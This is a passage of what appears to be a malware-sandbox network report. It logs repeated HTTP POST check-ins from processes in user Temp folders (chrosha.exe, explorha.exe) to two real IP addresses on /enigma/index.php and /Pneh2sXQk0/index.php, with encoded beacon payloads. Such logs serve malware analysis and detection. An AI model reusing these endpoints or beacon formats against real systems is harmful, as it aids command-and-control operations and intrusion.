                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:49.714169025 CEST    196    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
621    192.168.2.5    50467    193.233.132.167    80    8024    C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp    Bytes transferred    Direction    Data
Apr 19, 2024 03:32:49.838929892 CEST    309    OUT    POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:50.097141981 CEST    196    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
622    192.168.2.5    50468    193.233.132.56    80    4484    C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp    Bytes transferred    Direction    Data
Apr 19, 2024 03:32:50.067667007 CEST    158    OUT    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:50.311331987 CEST    219    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
623    192.168.2.5    50469    193.233.132.167    80    8024    C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp    Bytes transferred    Direction    Data
Apr 19, 2024 03:32:50.461823940 CEST    155    OUT    POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:50.709302902 CEST    197    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
624    192.168.2.5    50470    193.233.132.56    80    4484    C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp    Bytes transferred    Direction    Data
Apr 19, 2024 03:32:50.565610886 CEST    312    OUT    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:50.821535110 CEST    196    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
625    192.168.2.5    50471    193.233.132.167    80    8024    C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp    Bytes transferred    Direction    Data
Apr 19, 2024 03:32:50.956634998 CEST    309    OUT    POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:51.205957890 CEST    196    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
626 | 192.168.2.5 | 50472 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:51.184535027 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:51.435743093 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
627 | 192.168.2.5 | 50473 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:51.560429096 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:51.804146051 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
628 | 192.168.2.5 | 50474 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:51.685703993 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:51.935503960 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
629 | 192.168.2.5 | 50475 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:52.051920891 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:52.301539898 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
630 | 192.168.2.5 | 50476 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:52.288124084 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:52.533689976 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
631 | 192.168.2.5 | 50477 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:52.660840034 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:52.905416965 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
632 | 192.168.2.5 | 50478 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:52.789391041 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:53.045710087 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
633 | 192.168.2.5 | 50479 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:53.155658960 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:53.404165983 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
634 | 192.168.2.5 | 50480 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:53.395032883 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:53.637655973 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
635 | 192.168.2.5 | 50481 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:53.756688118 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:54.003565073 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
636 | 192.168.2.5 | 50482 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:53.887229919 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:54.136677980 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
637 | 192.168.2.5 | 50483 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:54.251106024 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:54.495412111 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
638 | 192.168.2.5 | 50484 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:54.488867044 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:54.730545044 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
639 | 192.168.2.5 | 50485 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:54.844367981 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:55.083471060 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
640 | 192.168.2.5 | 50486 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:54.979707956 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:55.228744030 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
641 | 192.168.2.5 | 50487 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:55.334659100 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
